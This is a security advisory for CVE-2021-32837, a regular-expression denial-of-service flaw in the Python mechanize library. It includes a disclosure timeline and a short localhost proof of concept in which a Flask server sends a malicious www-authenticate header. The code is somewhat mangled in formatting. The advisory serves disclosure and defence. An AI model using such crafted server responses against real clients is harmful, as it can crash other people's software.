Headline
CVE-2021-32837: GHSL-2021-108: ReDoS (Regular Expression Denial of Service) in mechanize - CVE-2021-32837
mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue.
Coordinated Disclosure Timeline
- 2021-08-31: Created issue asking for contact details.
- 2021-08-31: They added a security policy and closed the issue. I sent the report to [email protected]
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed [email protected] to ask if there will a new release of mechanize and whether there will be an advisory.
- 2021-09-01: Reply from [email protected]: “New version released”
Summary
mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
mechanize
Tested Version
v0.4.5
Details****ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.
Vulnerability
The vulnerable regular expression is here.
mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.
The reproduction steps below first start a webserver, and then starts mechanize. You can try to delete the resp.headers[… line to see how mechanize should behave.
Install mechanize and flask: pip3 install mechanize flask
Run the server below with python3:
from flask import Flask, make_response app = Flask(name)
@app.route(“/”) def home(): resp = make_response(“401 Unauthorized”) resp.status_code = 401 resp.headers[“www-authenticate”] = “,” return resp
if name == "main": app.run(debug=True, port=8080)
Leave the above server running while doing the next steps.
Run the below with python3:
import mechanize
br = mechanize.Browser() br.add_password("http://localhost:8080", "admin", “password”) br.open(“http://localhost:8080”)
Impact
This issue may lead to a denial of service.
- CVE-2021-32837
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
You can contact the GHSL team at [email protected], please include a reference to GHSL-2021-108 in any communication regarding this issue.
Related news
mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue.